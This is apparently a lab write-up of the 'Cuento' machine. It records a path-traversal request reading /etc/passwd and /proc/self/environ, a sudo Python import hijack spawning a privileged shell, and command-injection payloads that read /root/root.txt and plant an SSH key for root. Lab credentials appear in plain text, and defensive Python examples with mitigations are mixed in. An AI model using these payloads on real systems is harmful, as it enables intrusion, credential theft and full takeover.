The Hackers Labs - Cuento
Summary: This post records a complete penetration test. An ARP scan first finds the target IP 192.168.81.61, and an Nmap scan shows ports 22 (SSH) and 8080 (HTTP) open. An AWVS scan reveals an arbitrary file read in Next.js, which is used to read /etc/passwd and obtain the list of users. Reading the environment variables from /proc/self/environ exposes the password "ratonguaton", which gives a successful SSH login as rat

Information gathering
Find the target IP with arp-scan
┌──(root㉿kali)-[~]
└─# arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:04:d2:0f, IPv4: 192.168.81.26
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.81.61 08:00:27:17:43:b4 PCS Systemtechnik GmbH
192.168.81.189 f0:20:ff:13:f9:a2 (Unknown)
192.168.81.181 e6:34:88:c9:d0:6f (Unknown: locally administered)
192.168.81.181 e6:34:88:c9:d0:6f (Unknown: locally administered) (DUP: 2)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.950 seconds (131.28 hosts/sec). 3 responded
Scan the ports with nmap
┌──(root㉿kali)-[~]
└─# nmap -sC -sV 192.168.81.61 -n -vv -min-rate=2000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-03 15:45 CST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
Initiating ARP Ping Scan at 15:45
Scanning 192.168.81.61 [1 port]
Completed ARP Ping Scan at 15:45, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:45
Scanning 192.168.81.61 [65535 ports]
Discovered open port 8080/tcp on 192.168.81.61
Discovered open port 22/tcp on 192.168.81.61
SYN Stealth Scan Timing: About 45.95% done; ETC: 15:46 (0:00:36 remaining)
Completed SYN Stealth Scan at 15:46, 65.73s elapsed (65535 total ports)
Initiating Service scan at 15:46
Scanning 2 services on 192.168.81.61
Completed Service scan at 15:48, 101.21s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.81.61.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:48
Completed NSE at 15:48, 7.08s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:48
Completed NSE at 15:48, 1.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:48
Completed NSE at 15:48, 0.00s elapsed
Nmap scan report for 192.168.81.61
Host is up, received arp-response (0.00088s latency).
Scanned at 2026-01-03 15:45:21 CST for 175s
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7c:20:27:6a:11:ad:9e:32:d5:55:e0:45:50:7a:22:32 (RSA)
| 256 8b:28:87:e5:78:c7:ed:1d:eb:ea:5c:3e:04:f3:2a:64 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCUlAuupJU/WHnO2vAQ1lb30o58sGEIEqD2OoWIR9v7rWx3R9ilM6sozjhfx0CmNHCXPuksaofzASumqoWmK7Rg=
| 256 61:ab:7f:f0:31:f5:73:6b:4b:5b:d5:2f:a8:b5:32:4c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGHECYlrjWKvrvsgmeI6gitgSZ97SvOUzfWruE6mhTBW
8080/tcp open http-proxy syn-ack ttl 64
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200
| Content-Type: text/html
| Content-Length: 3928
| Cache-Control: public, max-age=3600
| <html>
| <style>
| .chat-container {
| max-width: 800px;
| margin: 0 auto;
| padding: 20px;
| font-family: sans-serif;
| </style>
| <body>
| <div id="ai-search-container" style="position: relative; width: 100%; max-width: 800px; margin: 20px auto;">
| <div class="search-box" style="display: flex; gap: 10px; padding: 10px;">
| <input
| type="text"
| id="ai-search-input"
| placeholder="Ask a question"
| style="flex-grow: 1; padding: 12px; border: 2px solid #FFD12F; border-radius: 8px; font-size: 16px;"
| <button
| id="ai-search-button"
|_ style="padding: 12px 24px; background: #FFD12F; border: none; border-radius: 8px; color: #1B4D7A; font-weight: bold; cursor: pointer;"
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:17:43:B4 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:48
Completed NSE at 15:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:48
Completed NSE at 15:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:48
Completed NSE at 15:48, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.25 seconds
Raw packets sent: 131121 (5.769MB) | Rcvd: 55 (2.404KB)
Visiting port 8080 shows a chat window, but nothing useful came of it. A dirsearch run did not find anything either!
┌──(root㉿kali)-[~]
└─# dirsearch dir -u http://192.168.81.61:8080/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.81.61_8080/__26-01-03_15-53-45.txt

Target: http://192.168.81.61:8080/

[15:53:45] Starting:
[15:53:46] 200 - 181B - /.cask
[15:53:48] 200 - 186B - /.gradletasknamecache
[15:53:49] 200 - 164B - /.idea/tasks.xml
[15:53:50] 404 - 126B - /.png
[15:53:51] 200 - 186B - /.rakeTasks
[15:53:52] 200 - 186B - /.stylish-haskell.yaml
[15:53:52] 200 - 173B - /.vscode/tasks.json
[15:53:55] 404 - 265B - /a4j/s/3_3_3.Finalorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/
[15:53:56] 200 - 168B - /actuator/;/scheduledtasks
[15:53:56] 200 - 186B - /actuator/scheduledtasks
[15:54:01] 404 - 156B - /admin_my_avatar.png
[15:54:05] 200 - 164B - /api/cask/graphql
[15:54:05] 404 - 176B - /api/swagger/static/index.html
[15:54:05] 500 - 54B - /api/whoami
[15:54:07] 404 - 144B - /base/static/c
[15:54:13] 404 - 156B - /doc/html/index.html
[15:54:13] 404 - 168B - /docs/html/admin/ch01.html
[15:54:13] 404 - 174B - /docs/html/admin/ch01s04.html
[15:54:13] 404 - 174B - /docs/html/admin/ch03s07.html
[15:54:13] 404 - 170B - /docs/html/admin/index.html
[15:54:13] 404 - 176B - /docs/html/developer/ch02.html
[15:54:13] 404 - 182B - /docs/html/developer/ch03s15.html
[15:54:13] 404 - 158B - /docs/html/index.html
[15:54:13] 200 - 173B - /druid/indexer/v1/taskStatus
[15:54:14] 404 - 197B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[15:54:16] 404 - 127B - /html/
[15:54:17] 404 - 143B - /html/cgi-bin/
[15:54:17] 404 - 146B - /html/config.rb
[15:54:17] 404 - 190B - /html/js/misc/swfupload/swfupload.swf
[15:54:17] 404 - 196B - /html/js/misc/swfupload/swfupload_f9.swf
[15:54:17] 404 - 191B - /html/js/misc/swfupload//swfupload.swf
[15:54:19] 200 - 181B - /jbpm-console/app/tasks.jsf
[15:54:21] 404 - 143B - /manager/html/
[15:54:22] 200 - 168B - /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https
[15:54:27] 404 - 180B - /phpmyadmin/docs/html/index.html
[15:54:27] 404 - 178B - /phpmyadmin/doc/html/index.html
[15:54:28] 404 - 162B - /public_html/robots.txt
[15:54:30] 200 - 164B - /scheduledtasks
[15:54:31] 200 - 164B - /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https
[15:54:33] 404 - 164B - /static/api/swagger.json
[15:54:33] 404 - 164B - /static/api/swagger.yaml
[15:54:33] 404 - 148B - /static/dump.sql
[15:54:34] 200 - 173B - /tasks/
[15:54:37] 404 - 142B - /web/static/c

Task Completed
Scanning with AWVS found an arbitrary file read in Next.js

Then, capturing and replaying the request with yakit, I read /etc/passwd successfully

Next, find the users that can log in remotely
┌──(root㉿kali)-[~]
└─# echo "
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:116::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:118:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:121:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
lightdm:x:114:122:Light Display Manager:/var/lib/lightdm:/bin/false
speech-dispatcher:x:115:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:116:124:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:117:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:118:126::/var/lib/saned:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:127::/nonexistent:/bin/false
colord:x:121:128:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
fwupd-refresh:x:122:129:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
pulse:x:123:130:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
vboxuser:x:1000:1000:vboxuser,,,:/home/vboxuser:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
raton:x:1001:1001::/home/raton:/bin/bash
sshd:x:124:65534::/run/sshd:/usr/sbin/nologin
odoo:x:125:134:odoo,,,:/opt/odoo:/bin/bash
postgres:x:126:135:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
grafana:x:127:136::/usr/share/grafana:/bin/false
churrumais:x:1002:1002::/home/churrumais:/bin/sh
log_agent:x:128:138::/home/log_agent:/usr/sbin/nologin
" | grep bash
root:x:0:0:root:/root:/bin/bash
vboxuser:x:1000:1000:vboxuser,,,:/home/vboxuser:/bin/bash
raton:x:1001:1001::/home/raton:/bin/bash
odoo:x:125:134:odoo,,,:/opt/odoo:/bin/bash
postgres:x:126:135:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
Then try the LFI again to read an SSH key; raton's SSH private key came back
HTTP/1.1 200
Content-Type: application/octet-stream
Cache-Control: public, max-age=3600
Content-Length: 2602

-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----
I thought I would get in over SSH with it, but things never go as planned! Connecting over SSH failed: the key is not accepted for login, a password is still required!
┌──(root㉿kali)-[/opt/zd]
└─# ssh raton@192.168.81.61 -i id2
The authenticity of host '192.168.81.61 (192.168.81.61)' can't be established.
ED25519 key fingerprint is: SHA256:YDTCNmlEFWKraxkJLyrJ2iclum6c/Vb9y9T2ARxG0gI
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.81.61' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
raton@192.168.81.61's password:
Permission denied, please try again.
raton@192.168.81.61's password:
Permission denied, please try again.
raton@192.168.81.61's password:
raton@192.168.81.61: Permission denied (publickey,password).
After some more searching it came back to reading files through the LFI, and the process environment turned out to contain a password: SNOWFLAKE_PASSWORD=ratonguaton
GET /static/../../../../../proc/self/environ HTTP/1.1
Host: 192.168.81.61:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

HTTP/1.1 200
Content-Type: application/octet-stream
Cache-Control: public, max-age=3600
Content-Length: 699

LANG=en_US.UTF-8
LANGUAGE=en_US:
LC_ADDRESS=es_MX.UTF-8
LC_IDENTIFICATION=es_MX.UTF-8
LC_MEASUREMENT=es_MX.UTF-8
LC_MONETARY=es_MX.UTF-8
LC_NAME=es_MX.UTF-8
LC_NUMERIC=es_MX.UTF-8
LC_PAPER=es_MX.UTF-8
LC_TELEPHONE=es_MX.UTF-8
LC_TIME=es_MX.UTF-8
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
HOME=/home/raton
LOGNAME=raton
USER=raton
SHELL=/bin/bash
INVOCATION_ID=1abdc01495ee436ebdcbce4b4d454580
JOURNAL_STREAM=8:23242
AZURE_OPENAI_API_KEY=sk-example1234567890abcdef1234567890
AZURE_OPENAI_ENDPOINT=https://example.openai.azure.com/
AZURE_OPENAI_API_VERSION=2023-05-15
SNOWFLAKE_ACCOUNT=myorg-myaccount
SNOWFLAKE_USER=user_new
SNOWFLAKE_PASSWORD=ratonguaton
PORT=8080
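The request above works because the /static/ handler joins the URL path onto its document root without checking that the result stays inside it, so /proc/self/environ (and every secret exported to the process) is readable. The following is an added example, not the lab's or Next.js's code: a resolver that rejects such paths, and a check run over constructed access-log lines modelled on this request. STATIC_ROOT is an assumed document root.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for the example; the lab's real root is not on the page.
STATIC_ROOT = "/srv/app/static"


def resolve_static(request_path, root=STATIC_ROOT):
    """Map a URL path under /static/ to a filesystem path, or return None
    when the path would escape the root.

    Order matters: decode percent-encoding once (as the server does), then
    collapse '.' and '..' lexically, then check containment. Looking for the
    substring '..' before decoding would miss '%2e%2e'.
    """
    if not request_path.startswith("/static/"):
        return None
    rel = unquote(request_path[len("/static/"):])
    # NUL bytes and backslashes never occur in legitimate asset names and are
    # classic ways to confuse a path check, so reject them outright.
    if "\x00" in rel or "\\" in rel:
        return None
    # posixpath.join discards root when rel is absolute ('/static//etc/passwd')
    # and normpath resolves '..' segments; both cases fail the check below.
    joined = posixpath.normpath(posixpath.join(root, rel))
    root = root.rstrip("/")
    if joined != root and not joined.startswith(root + "/"):
        return None
    # This is a lexical check only: on a real filesystem also compare
    # os.path.realpath(joined) against realpath(root) so that a symlink
    # planted under the static directory cannot point outside it.
    return joined


def traversal_hits(access_log_lines, root=STATIC_ROOT):
    """Return (line_number, path) for access-log lines whose request path
    would escape the static root. Lines are in common log format, so the
    request is the first double-quoted field: "GET /path HTTP/1.1"."""
    hits = []
    for n, line in enumerate(access_log_lines, 1):
        parts = line.split('"')
        if len(parts) < 2:
            continue
        fields = parts[1].split()
        if len(fields) < 2:
            continue
        path = fields[1]
        if path.startswith("/static/") and resolve_static(path, root) is None:
            hits.append((n, path))
    return hits


# Constructed sample lines (not from the lab), modelled on the request above.
SAMPLE_LOG = [
    '192.168.81.26 - - [03/Jan/2026:15:53:46 +0800] "GET /static/css/app.css HTTP/1.1" 200 1024',
    '192.168.81.26 - - [03/Jan/2026:16:02:11 +0800] "GET /static/../../../../../proc/self/environ HTTP/1.1" 200 699',
    '192.168.81.26 - - [03/Jan/2026:16:02:30 +0800] "GET /static/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 2950',
    '192.168.81.26 - - [03/Jan/2026:16:03:02 +0800] "GET /static/js/../css/app.css HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for n, path in traversal_hits(SAMPLE_LOG):
        print(f"line {n}: {path} escapes {STATIC_ROOT}")
```

The fourth sample line contains '..' but stays inside the root, so it is not flagged; a 200 response to one of the flagged paths is the signal that the server lacks this check.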
Entering this password logged in successfully!
Privilege escalation
Once in, there are plenty of files in the directory. First check whether sudo can be used. It can; after some experimenting I settled on escalating via hijacking. Escalation to churrumais succeeded!
raton@cuentos:~/Desktop$ sudo -l
Matching Defaults entries for raton on cuentos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User raton may run the following commands on cuentos:
(churrumais) NOPASSWD: /usr/bin/python3 /home/raton/Desktop/raton.py
raton@cuentos:~/Desktop$ ls -al /home/raton/Desktop/raton.py
-rw-r--r-- 1 root root 23665 sep 16 01:33 /home/raton/Desktop/raton.py
raton@cuentos:~/Desktop$ ls -al
total 60
drwxrwxr-x 2 raton raton 4096 ene 3 09:02 .
drwxr-xr-x 12 raton raton 4096 sep 16 00:46 ..
-rwxrwxr-x 1 raton raton 38 ene 3 09:02 random.py
-rw-r--r-- 1 root root 23665 sep 16 01:33 raton.py
-rwxr-xr-x 1 root root 20701 ago 25 01:30 raton.py.save
raton@cuentos:~/Desktop$ cat random.py
import os;
os.system('/bin/bash -p');
raton@cuentos:~/Desktop$ sudo -u churrumais /usr/bin/python3 /home/raton/Desktop/raton.py
churrumais@cuentos:/home/raton/Desktop$
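The listing above shows why this works: Python puts the script's own directory first on sys.path, so a random.py that raton can write next to raton.py is imported in place of the standard library module, and the sudo rule runs it as churrumais. The following is an added example (not the lab's or the author's code) that audits a script named in a sudo rule for imports that a file in its directory would shadow; SAMPLE_SCRIPT is a constructed stand-in for the 23 KB raton.py, which the page does not show.

```python
import ast
import os
import tempfile


def imported_names(script_path):
    """Top-level module names the script imports anywhere (e.g. 'random')."""
    with open(script_path, "rb") as f:
        tree = ast.parse(f.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                names.add(alias.name.split(".")[0])
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names


def shadowing_files(script_path):
    """{module_name: path} for files in the script's directory that Python
    would import instead of the real module, because the script directory
    is sys.path[0] and is searched before the standard library."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    found = {}
    for name in imported_names(script_path):
        for candidate in (os.path.join(script_dir, name + ".py"),
                          os.path.join(script_dir, name, "__init__.py")):
            if os.path.exists(candidate):
                found[name] = candidate
                break
    return found


def audit(script_path):
    """Findings for a script that a sudo rule runs as another user. Run it
    as the user who is allowed to invoke the rule, so os.access reflects
    that user's write permissions."""
    findings = []
    script_dir = os.path.dirname(os.path.abspath(script_path))
    for name, path in sorted(shadowing_files(script_path).items()):
        findings.append(f"import '{name}' is shadowed by {path}")
    if os.access(script_dir, os.W_OK):
        findings.append(f"script directory {script_dir} is writable by the "
                        "invoking user: any import can be hijacked")
    if os.access(script_path, os.W_OK):
        findings.append(f"{script_path} is writable by the invoking user")
    return findings


# Constructed stand-in for raton.py (the real script is not on the page).
SAMPLE_SCRIPT = ("import os\nimport random\nfrom datetime import datetime\n"
                 "print(datetime.now(), random.randint(1, 6))\n")


def build_lab_layout():
    """Recreate the shape of the listing above in a temp dir: raton.py next
    to a planted random.py, in a directory the invoking user can write."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "raton.py")
    with open(script, "w") as f:
        f.write(SAMPLE_SCRIPT)
    with open(os.path.join(d, "random.py"), "w") as f:
        f.write("# planted module stand-in; intentionally empty\n")
    return script


if __name__ == "__main__":
    # Mitigation: keep the script in a root-owned, non-writable directory and
    # put 'python3 -I /path/script.py' in the sudoers rule; isolated mode
    # drops the script directory from sys.path and ignores PYTHONPATH.
    for line in audit(build_lab_layout()):
        print(line)
```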
As churrumais, going straight to the home directory shows that .bash_history was never deleted!
churrumais@cuentos:~$ ls -al
total 68
drwxr-xr-x 6 churrumais churrumais 4096 dic 9 12:26 .
drwxr-xr-x 4 root root 4096 sep 12 23:14 ..
-rw------- 1 churrumais churrumais 8337 ene 3 09:19 .bash_history
-rw-r--r-- 1 churrumais churrumais 220 feb 25 2020 .bash_logout
-rw-r--r-- 1 churrumais churrumais 3811 sep 14 00:44 .bashrc
drwx------ 2 churrumais churrumais 4096 sep 14 00:53 .cache
drwxr-xr-x 5 churrumais churrumais 4096 sep 14 00:53 .config
drwxrwxr-x 3 churrumais churrumais 4096 sep 11 16:55 .local
-rw-r--r-- 1 churrumais churrumais 807 feb 25 2020 .profile
drwxrwxr-x 2 churrumais churrumais 4096 dic 9 12:26 .ssh
-rw-rw-r-- 1 churrumais churrumais 1048 dic 9 12:18 system_report_20251209_121827.json
-rw-rw-r-- 1 churrumais churrumais 1049 dic 9 12:19 system_report_20251209_121933.json
-rw-rw-r-- 1 churrumais churrumais 1033 dic 9 12:21 system_report_20251209_122120.json
-rw-r--r-- 1 churrumais churrumais 1600 abr 8 2020 .Xdefaults
-rw-r--r-- 1 churrumais churrumais 14 abr 8 2020 .xscreensaver
churrumais@cuentos:~$ cat .bash_history
ls -l
ps aux | grep loganalyzer
cat /opt/loganalyzer/app.py
curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13'
curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13' -r
curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13' -l
curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13' -L
curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13'
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; cat /root/root.txt #"
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; cat /root/root.txt #"
cat /tmp/cookies.txt
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; cat /root/root.txt #"
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; id #"
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; id #"
curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13'
rm /tmp/cookies.txt
curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13'
cat /tmp/cookies.txt
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d 'filter=' ; id #'
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs --data-urlencode "filter=' ; mkdir -p /root/.ssh ; echo 'ssh-rsa ... root@kali' >> /root/.ssh/authorized_keys #"
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs --data-urlencode "filter=' ; mkdir -p /root/.ssh ; echo 'ssh-rsa ... root@kali ' >> /root/.ssh/authorized_keys #"
ls -l
ls -la
cat .bash_history
exit
id
sudo -l
exit
ls -al
cd
ls -al
cat .bash_history
ss -lunpt
ls -al /tmp/
url -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13' -L
curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13'
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; cat /root/root.txt #"
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; cat /root/root.txt #"
cat /tmp/cookies.txt
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; cat /root/root.txt #"
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; id #"
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d "filter=' ; id #"
curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13'
rm /tmp/cookies.txt
curl -c /tmp/cookies.txt -X POST http://127.0.0.1:5000/login -d 'username=churrumais&password=VillaeEla13'
cat /tmp/cookies.txt
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs -d 'filter=' ; id #'
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs --data-urlencode "filter=' ; mkdir -p /root/.ssh ; echo 'ssh-rsa ... root@kali' >> /root/.ssh/authorized_keys #"
curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs --data-urlencode "filter=' ; mkdir -p /root/.ssh ; echo 'ssh-rsa ... root@kali ' >> /root/.ssh/authorized_keys #"
ls -l
ls -la
cat .bash_history
exit
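The history shows the root-owned LogAnalyzer service on port 5000 passing the filter parameter to a shell: a value of ' ; id # closes the quote the app put around it, runs a second command, and comments out the rest of the line. The following is an added example, not LogAnalyzer's code (its app.py is not on the page): the vulnerable string construction the payload implies, shown only as a string, beside two fixed versions, and a search run over a constructed log file so the injection text is matched literally instead of executed.

```python
import os
import shlex
import subprocess
import tempfile


def grep_command_unsafe(pattern, log_path="/var/log/app.log"):
    """The bug: user input interpolated into a shell command string. With
    pattern "' ; id #" this yields  grep '' ; id #' /var/log/app.log
    where the quote closes early, ';' starts a second command and '#'
    comments out the rest. Returned only as a string; never executed here."""
    return f"grep '{pattern}' {log_path}"


def grep_command_quoted(pattern, log_path="/var/log/app.log"):
    """If a shell string is truly unavoidable, shlex.quote makes the whole
    pattern one single-quoted word, so ';' and '#' stay literal."""
    return f"grep {shlex.quote(pattern)} {shlex.quote(log_path)}"


def grep_argv_safe(pattern, log_path="/var/log/app.log"):
    """Preferred fix: no shell at all. The pattern is a single argv element,
    '--' stops option parsing so a pattern starting with '-' is not read as
    a grep flag, and -F makes it a fixed string rather than a regex."""
    return ["grep", "-F", "--", pattern, log_path]


def search_logs(pattern, log_path):
    """Run grep with shell=False and return matching lines. grep exits 1 for
    'no match', which is not an error for a search endpoint."""
    proc = subprocess.run(grep_argv_safe(pattern, log_path),
                          capture_output=True, text=True)
    if proc.returncode > 1:
        raise RuntimeError(proc.stderr.strip())
    return proc.stdout.splitlines()


# Constructed sample log (not the lab's); the second line contains the
# injection text literally, which is exactly what a search should find.
CONSTRUCTED_LOG = [
    "2026-01-03 09:19:01 INFO login ok user=churrumais",
    "2026-01-03 09:19:05 WARN search_logs filter=' ; id #",
    "2026-01-03 09:19:09 ERROR search_logs filter=error backend timeout",
]


def demo_search(pattern):
    """Write the sample log to a temp file and search it the safe way."""
    d = tempfile.mkdtemp()
    path = os.path.join(d, "app.log")
    with open(path, "w") as f:
        f.write("\n".join(CONSTRUCTED_LOG) + "\n")
    return search_logs(pattern, path)


if __name__ == "__main__":
    print("unsafe :", grep_command_unsafe("' ; id #"))
    print("quoted :", grep_command_quoted("' ; id #"))
    print("argv   :", grep_argv_safe("' ; id #"))
    print("matches:", demo_search("' ; id #"))
```

Running the service as a dedicated low-privilege account rather than root would also have kept a successful injection from writing /root/.ssh/authorized_keys.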
Then just follow that command to plant an SSH key and escalate!
churrumais@cuentos:~$ curl -b /tmp/cookies.txt -X POST http://127.0.0.1:5000/search_logs --data-urlencode "filter=' ; mkdir -p /root/.ssh ; echo 'ssh-rsa ... root@kali ' >> /root/.ssh/authorized_keys #"
<html lang="es">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>LogAnalyzer Pro</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet">
<style>
body {
background-color: #f8f9fa;
padding-top: 20px;
}
.container {
max-width: 1200px;
}
pre {
background-color: #f8f9fa;
padding: 15px;
border-radius: 5px;
overflow-x: auto;
}
.navbar-brand {
font-weight: bold;
}
</style>
</head>
<body>
